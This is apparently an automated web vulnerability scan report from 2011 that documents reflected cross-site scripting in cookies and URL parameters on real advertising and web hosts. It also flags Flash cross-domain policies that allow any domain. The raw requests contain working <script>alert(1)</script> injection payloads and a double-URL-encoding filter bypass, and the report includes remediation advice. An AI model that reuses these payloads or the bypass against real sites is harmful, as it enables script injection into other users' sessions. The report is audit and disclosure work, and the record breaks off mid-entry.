GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&99107<script>alert(1)</script>48b53053bd9; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:01 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:01 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:01 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999601; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... ();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&99107<script>alert(1)</script>48b53053bd9', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01: ...[SNIP]...
The value of the ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 6f161<script>alert(1)</script>116bcb4cb71 was submitted in the ar_p68511049 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&6f161<script>alert(1)</script>116bcb4cb71; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:02 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:02 2011&6f161<script>alert(1)</script>116bcb4cb71=&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:02 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999602; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&6f161<script>alert(1)</script>116bcb4cb71' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 737bb<script>alert(1)</script>d3335e0ecc7 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&737bb<script>alert(1)</script>d3335e0ecc7; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:01 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:01 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:01 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999601; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&737bb<script>alert(1)</script>d3335e0ecc7', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket. ...[SNIP]...
The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 37efe<script>alert(1)</script>0b4fc9ef21a was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&37efe<script>alert(1)</script>0b4fc9ef21a; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:03 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:03 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:03 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999603; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... 011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&37efe<script>alert(1)</script>0b4fc9ef21a', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
The value of the adsud cookie is copied into the HTML document as plain text between tags. The payload eb669<script>alert(1)</script>2ccf81f300f was submitted in the adsud cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /a/e/r21719?5170057 HTTP/1.1 Host: c03.adsummos.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adsuu=vmkju57YZhpA; adsud=BLU0YPLeb669<script>alert(1)</script>2ccf81f300f; adsud9=
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 331 Content-Type: application/javascript Set-Cookie: CMP=; expires=Fri, 06 May 2011 22:26:52 GMT; path=/; domain=.adsummos.net; Set-Cookie: adsud9=; expires=Fri, 06 May 2011 22:26:52 GMT; path=/; domain=.adsummos.net; ETag: "d98ff88b2ecbaa69302dcef0a5670a60:1296529755" P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA" P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA" Cache-Control: max-age=86400 Date: Sat, 05 Feb 2011 22:26:52 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a95b4<a>230da93002d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go/55498a95b4<a>230da93002d/http:/resolve.iscool.net/ HTTP/1.1 Host: www.download32.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=f1d128b0b804710c566c802ba5200831; __qca=P0-1697810850-1296942494788;
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 364ad<a>7bbef7c128b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go/55498/http:364ad<a>7bbef7c128b/resolve.iscool.net/ HTTP/1.1 Host: www.download32.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=f1d128b0b804710c566c802ba5200831; __qca=P0-1697810850-1296942494788;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a80ad%2527%253b5ce21070ae6 was submitted in the IS_UASrackuid cookie. This input was echoed as a80ad';5ce21070ae6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hosting/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsea_cust=1; lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=47003812.1296921517.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; s_sq=%5B%5BB%5D%5D; s_ppv=5; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; chatslidercookie=invitesent; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a80ad%2527%253b5ce21070ae6; _vis_opt_s=1%7C; livechat=instantservice; s_cc=true; PHPSESSID=4fd4e850dc445f927d55acdbc1e84403; chatslider=B; __utma=47003812.1362301340.1296919297.1296921517.1297007047.3; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.1.10.1297007047; s_pv=rackspaceUS%3Ablog%3Ahome;
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad-emea.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 393 Last-Modified: Wed, 22 Oct 2008 17:22:36 GMT Date: Sun, 06 Feb 2011 17:43:33 GMT
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.de.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 393 Last-Modified: Wed, 22 Oct 2008 17:22:36 GMT Date: Sun, 06 Feb 2011 17:43:28 GMT
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.zanox.com
Response
HTTP/1.1 200 OK Content-Length: 330 Content-Type: text/xml Last-Modified: Thu, 17 Sep 2009 16:58:09 GMT Accept-Ranges: bytes ETag: "5ed8c08b837ca1:4a9" Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 17:37:36 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.bit.ly
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:32:43 GMT Content-Type: text/xml Content-Length: 141 Last-Modified: Mon, 09 Aug 2010 21:22:00 GMT Connection: close Expires: Mon, 07 Feb 2011 23:32:43 GMT Cache-Control: max-age=172800 Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ar.voicefive.com
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: text/xml Connection: close Vary: Accept-Encoding Accept-Ranges: bytes Content-Length: 230 Vary: Accept-Encoding,User-Agent P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: au2m8.com
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=NQJKKYS192.168.100.219CKOWU; path=/ Date: Sun, 06 Feb 2011 13:24:34 GMT Server: Apache Last-Modified: Wed, 03 Dec 2008 12:41:21 GMT ETag: "b6843d-66-45d23c2d7be40" Accept-Ranges: bytes Content-Length: 102 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.voicefive.com
Response
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Mon, 07 Feb 2011 13:40:00 GMT Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: blog.vibrantmedia.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 02 Mar 2005 18:36:18 GMT Accept-Ranges: bytes ETag: "03debb8561fc51:0" Server: Microsoft-IIS/7.5 p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:45:44 GMT Connection: close Content-Length: 202
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: bs.serving-sys.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT Accept-Ranges: bytes ETag: "0e2c3cba13c91:0" P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 06 Feb 2011 13:21:30 GMT Connection: close Content-Length: 100
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.manualsonline.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.14 (Fedora) Last-Modified: Wed, 26 Jan 2011 14:52:42 GMT ETag: "810108-ef-49ac0fc2c4280" Accept-Ranges: bytes Content-Length: 239 Content-Type: text/xml Date: Sat, 05 Feb 2011 22:46:27 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
